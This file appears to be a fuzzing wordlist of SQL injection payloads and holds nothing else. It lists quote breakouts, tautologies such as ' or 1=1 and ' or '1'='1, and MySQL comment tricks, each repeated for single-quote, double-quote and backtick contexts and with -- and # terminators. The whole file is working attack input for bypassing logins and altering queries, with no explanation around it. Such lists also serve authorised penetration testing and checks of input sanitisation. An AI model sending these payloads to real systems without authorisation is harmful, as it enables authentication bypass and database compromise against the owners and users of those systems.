-x()
\
[$]
'
]'
\'
/*'*/
/*!1'*/
'||'test'||'
' or '1'='1
' or 1=1
 or '1'='1
 or 1=1
'or''='
')
' | 1=1
' & 1=1
' or 1=1 limit 1
'-- -
]'-- -
\'-- -
/*'*/-- -
/*!1'*/-- -
'||'test'||'-- -
' or '1'='1-- -
' or 1=1-- -
 or '1'='1-- -
 or 1=1-- -
'or''='-- -
')-- -
' | 1=1-- -
' & 1=1-- -
' or 1=1 limit 1-- -
'# -
]'# -
\'# -
/*'*/# -
/*!1'*/# -
'||'test'||'# -
' or '1'='1# -
' or 1=1# -
 or '1'='1# -
 or 1=1# -
'or''='# -
')# -
' | 1=1# -
' & 1=1# -
' or 1=1 limit 1# -
"
]"
\"
/*"*/
/*!1"*/
"||"test"||"
" or "1"="1
" or 1=1
 or "1"="1
 or 1=1
"or""="
")
" | 1=1
" & 1=1
" or 1=1 limit 1
"-- -
]"-- -
\"-- -
/*"*/-- -
/*!1"*/-- -
"||"test"||"-- -
" or "1"="1-- -
" or 1=1-- -
 or "1"="1-- -
 or 1=1-- -
"or""="-- -
")-- -
" | 1=1-- -
" & 1=1-- -
" or 1=1 limit 1-- -
"# -
]"# -
\"# -
/*"*/# -
/*!1"*/# -
"||"test"||"# -
" or "1"="1# -
" or 1=1# -
 or "1"="1# -
 or 1=1# -
"or""="# -
")# -
" | 1=1# -
" & 1=1# -
" or 1=1 limit 1# -
`
]`
\`
/*`*/
/*!1`*/
`||`test`||`
` or `1`=`1
` or 1=1
 or `1`=`1
 or 1=1
`or``=`
`)
` | 1=1
` & 1=1
` or 1=1 limit 1
`-- -
]`-- -
\`-- -
/*`*/-- -
/*!1`*/-- -
`||`test`||`-- -
` or `1`=`1-- -
` or 1=1-- -
 or `1`=`1-- -
 or 1=1-- -
`or``=`-- -
`)-- -
` | 1=1-- -
` & 1=1-- -
` or 1=1 limit 1-- -
`# -
]`# -
\`# -
/*`*/# -
/*!1`*/# -
`||`test`||`# -
` or `1`=`1# -
` or 1=1# -
 or `1`=`1# -
 or 1=1# -
`or``=`# -
`)# -
` | 1=1# -
` & 1=1# -
` or 1=1 limit 1# -
